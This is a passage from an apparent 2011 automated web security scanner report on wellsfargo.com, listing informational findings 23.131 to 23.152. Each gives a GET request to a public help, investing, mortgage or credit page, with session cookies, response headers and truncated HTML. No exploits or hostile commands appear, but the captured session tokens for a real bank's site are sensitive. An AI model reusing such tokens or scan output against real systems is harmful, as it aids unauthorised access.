Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:21 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service f
...[SNIP]...

23.131. https://www.wellsfargo.com/help/faqs/signon_faqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/faqs/signon_faqs

Request

GET /help/faqs/signon_faqs HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:22 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vXXtNJhCXy5g11qrwqXKMTLPF3dHrhGLJvg8Wj9MRTTBXJmf9lQT!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head><title>Wells Fargo Username/Password Hel
...[SNIP]...

23.132. https://www.wellsfargo.com/help/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/services

Request

GET /help/services HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:23 GMT
Content-length: 11416
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=TYQnNJhDw4QJgQtW7VVtnt2LBv3VJm8hq3Dj4zygqfRB09vyWKnn!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service -
...[SNIP]...

23.133. https://www.wellsfargo.com/insurance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /insurance/

Request

GET /insurance/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:54 GMT
Content-length: 8678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FYpQNJhCkvzKSyh2MqHzf7L6MkTTHxnLMf7gMw7y6G64TqKC2T9m!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Insurance
...[SNIP]...

23.134. https://www.wellsfargo.com/insurance/id_credit_protection/idtheft  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /insurance/id_credit_protection/idtheft

Request

GET /insurance/id_credit_protection/idtheft HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:55 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9hF3NJhDTdc9PnjFnWG989NpqqdGyhQPmS2jnC9JQXqKM20QvTm9!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Identity Theft Protection - Id
...[SNIP]...

23.135. https://www.wellsfargo.com/investing/hsa/enroll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/hsa/enroll

Request

GET /investing/hsa/enroll HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:52 GMT
Content-length: 9955
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=rGCpNJhQ3J2yYLGgChygHTVGrrYQnxRYXjGV7X8q1RBBkR0MCZRz!1893615402; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Health Savings Acc
...[SNIP]...

23.136. https://www.wellsfargo.com/investing/investmentservices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/investmentservices/

Request

GET /investing/investmentservices/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 8732
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3JcNNJhpcnnt2lQ8QP1vrTvQjGQzrsnrVYcCqTsht4tMhdvxRqh3!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Investment Services</tit
...[SNIP]...

23.137. https://www.wellsfargo.com/investing/more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/more

Request

GET /investing/more HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:51 GMT
Content-length: 12093
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2H4zNJhfczGZqD2NxFyn8Gw3cRRJsvd31PWX0Bjp5vwZRm5mlXBy!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Investing</t
...[SNIP]...

23.138. https://www.wellsfargo.com/investing/mutual_funds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/mutual_funds/

Request

GET /investing/mutual_funds/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 12036
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=jrPSNJhptZ2KBS3w22FGDn8wnzWjhJTmp2lJ153w81CP30LvyQTs!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Mutual Fund Center
...[SNIP]...

23.139. https://www.wellsfargo.com/investing/retirement/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/retirement/

Request

GET /investing/retirement/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 9837
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=72X3NJhdnllJ1jBN4whcFnn1dmL5hH6sM9yrH5Lk27rBF3pGF0Tb!215502378; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1844730634.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Retirement Accounts, P
...[SNIP]...

23.140. https://www.wellsfargo.com/investing/retirement/openira/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/retirement/openira/

Request

GET /investing/retirement/openira/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=YJV8NJhdhdMLGnSv274NzJTQHrvNQ2n3CBLWGMBzrdc8XGhTGsbN!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Open an IRA (Individual Retire
...[SNIP]...

23.141. https://www.wellsfargo.com/jump/about/fdic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/about/fdic

Request

GET /jump/about/fdic HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:08 GMT
Content-length: 9678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=x1trNJhJGTGqVyL185v7GXzvQBCvYpMvVYwVg3sGTsGMgTVGz2YG!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

23.142. https://www.wellsfargo.com/jump/applications/inprogress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/applications/inprogress

Request

GET /jump/applications/inprogress HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:07 GMT
Content-length: 4747
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=6WsvNJhTXvxJ1jsxDf1m1Gy1rlbWnMwpT7vJFPgxrMwwt58cy9lN!-213655893; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

23.143. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/EFS/WAC1

Request

GET /jump/wachovia/EFS/WAC1 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:05 GMT
Content-length: 6663
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LfRNNJhRvn61Cp8bXrFGLwg6QQKWryy89ht4J427MtcBftWn8JsH!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

23.144. https://www.wellsfargo.com/jump/wachovia/insurance/identity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/insurance/identity

Request

GET /jump/wachovia/insurance/identity HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:06 GMT
Content-length: 6816
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=L8vkNJhRGXvkQ866j1p1HL661fxkJ10Hh3p3z1R94dLrvJqJY68V!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

23.145. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/mortgage/firsttimebuyer

Request

GET /jump/wachovia/mortgage/firsttimebuyer HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:04 GMT
Content-length: 5035
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=1gkYNJhQQn3L4d35JJzHLx12XJJJy7MyGNVyGmm9TLdyvPwZy7Lh!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

23.146. https://www.wellsfargo.com/mortgage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/

Request

GET /mortgage/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:41 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9VjQNJhV9tfpnq1TVd2hsJPwPGsqdkCgbFhYGJsJTrttBpTLdsjY!-705334509; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Mortgage Information .
...[SNIP]...

23.147. https://www.wellsfargo.com/mortgage/rates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/rates

Request

GET /mortgage/rates HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:42 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=PsQGNJhWhPYpQG5wL5SzPh2J1YWrTbhJ7vlz6gn2nL8spbsB9vjF!1192939746; domain=.wellsfargo.com; path=/; secure
Content-Language: en
Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - To
...[SNIP]...

23.148. https://www.wellsfargo.com/online_brokerage/education/trading/volatile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /online_brokerage/education/trading/volatile/

Request

GET /online_brokerage/education/trading/volatile/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:01 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/
Connection: close


<IMPORTBEAN BEAN="/wellsfargo/www/onlinebrokerage/education/TradingCatalog">
<head>
<title>Wells Fargo Online Brokerage</title>

<script language="JavaScript" type="text/javascript">


       document.w
...[SNIP]...

23.149. https://www.wellsfargo.com/per/more/banking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /per/more/banking

Request

GET /per/more/banking HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:39 GMT
Content-length: 10949
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Banking Overview</
...[SNIP]...

23.150. https://www.wellsfargo.com/per/more/loans_credit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /per/more/loans_credit

Request

GET /per/more/loans_credit HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:40 GMT
Content-length: 10611
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo - Loans an
...[SNIP]...

23.151. https://www.wellsfargo.com/personal_credit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /personal_credit/

Request

GET /personal_credit/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:47 GMT
Content-length: 7834
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo - Personal C
...[SNIP]...

23.152. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /personal_credit/rate_payments/rate_calc_main

Request

GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1
